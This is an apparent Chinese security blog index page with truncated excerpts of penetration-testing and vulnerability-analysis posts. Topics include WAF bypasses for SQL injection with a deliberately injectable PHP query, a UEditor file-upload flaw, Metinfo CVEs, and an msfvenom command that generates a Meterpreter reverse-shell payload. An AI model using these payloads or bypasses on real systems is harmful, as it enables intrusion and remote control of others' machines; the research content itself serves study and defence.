News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

The Lastest

渗透测试,漏洞研究

实战对某厂商演示站点的一次渗透测试

jasonx 1376 0

注意:该文章为本站原创文章,如需转载,请注明出处,作者:jasonx 网址:www.jasonx.cc 谢谢。前言其实这个厂商之前就挖过他们家漏洞,提交了不少漏洞给他们,如今都修复了,最近闲来无事,又对他们演示站点进行了一次“深入”研究。0x01 演示站点入手打开他们演示站点,测试了一下之前的漏洞,空账号空密码登录已经被修复了,尝试弱口令登录,123456登录进去了。然后对之前的存在漏洞的上传点再次尝试截断上传,发现已经修复了。后...

漏洞研究

多姿势绕过 360主机卫士SQL注入防御

jasonx 1164 0

0x01 环境搭建360主机卫士官网:http://zhuji.360.cn软件版本:360主机卫士Apache 纪念版测试环境:phpStudy本地构造SQL注入点:$id=$_REQUEST['id']; $query = "SELECT * FROM admin WHERE id = $id "; 0x02 WAF测试因zhuji.360.cn站点已关闭,拦截界面为空白,抓包先放一张拦截图:姿势一:网站...

漏洞研究

UEditor编辑器两个版本任意文件上传漏洞分析

jasonx 3027 0

前言UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。漏洞利用笔者本地测试的编辑器是官方下载最新的版本1.4.3.3 http:/...

漏洞研究

sqlmap注入之tamper绕过WAF防火墙

jasonx 1915 0

但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。如何判断使用哪个脚本最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。直接加个单引号被过滤,说明注入时单引号是没法用的...

漏洞研究

Metinfo 6.0.0 众多漏洞分析

jasonx 1185 0

最近在seebug上浏览漏洞,发现metinfo爆出了很多危害很大的漏洞,然后看了一下cve列表,竟然还有这么多,既然这样那就开始跟踪学习起来。 伪全局变量首先metinfo在全局都使用了一种对传入参数进行封装的方法,也就是伪全局变量覆盖,下面是核心代码:这也是我在之前的文章中提到的,在开发中多封装一层的好处,可以在很多地方避免因为没有过滤就拼接数据到sql变量中,导致的sql注入,这也是给大家在开发过程中需要注意的地方。 CVE...

渗透测试

Metasploit(MSF)多种payload生成

jasonx 2490 0

前言:在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l 生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。Windowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Co...

网络技术

windows 下搭建shadowsocks 服务端

jasonx 3036 0

Linux下搭建服务端已经非常常见了,今天尝试在windows 下搭建shadowsocks 服务现将记录如下一、下载 libQtShadowsocksWindows服务端软件下载地址https://github.com/shadowsocks/libQtShadowsocks/releases根据自己电脑系统版本下载对应的版本,下载后进行解压得到文件 shadowsocks-libqss.exe二、配置相关文件在程序目录下创建...